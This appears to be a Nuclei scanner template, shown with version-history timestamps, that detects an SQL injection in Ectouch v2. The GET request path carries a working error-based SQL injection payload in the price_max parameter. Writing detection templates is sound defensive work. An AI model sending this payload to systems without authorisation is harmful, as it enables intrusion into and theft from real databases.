nuclei-templates/vulnerabilities/other/etouch-v2-sqli.yaml

30 lines
714 B
YAML
Raw Normal View History

2021-04-07 16:33:17 +00:00
id: etouch-v2-sqli
2021-04-07 16:33:17 +00:00
info:
2021-04-26 05:51:08 +00:00
name: Ectouch v2 SQL Injection
2021-04-07 16:33:17 +00:00
author: princechaddha
severity: high
reference:
2021-04-26 05:48:16 +00:00
- https://github.com/mstxq17/CodeCheck/
- https://www.anquanke.com/post/id/168991
tags: etouch,sqli
2021-04-07 16:33:17 +00:00
2022-06-30 03:05:53 +00:00
variables:
num: "999999999"
2021-04-07 16:33:17 +00:00
requests:
- method: GET
path:
2022-06-30 03:05:53 +00:00
- "{{BaseURL}}/upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5({{num}}),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)''"
2021-04-07 16:33:17 +00:00
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
2022-06-30 03:05:53 +00:00
- '{{md5({{num}})}}'
2021-04-07 16:33:17 +00:00
part: body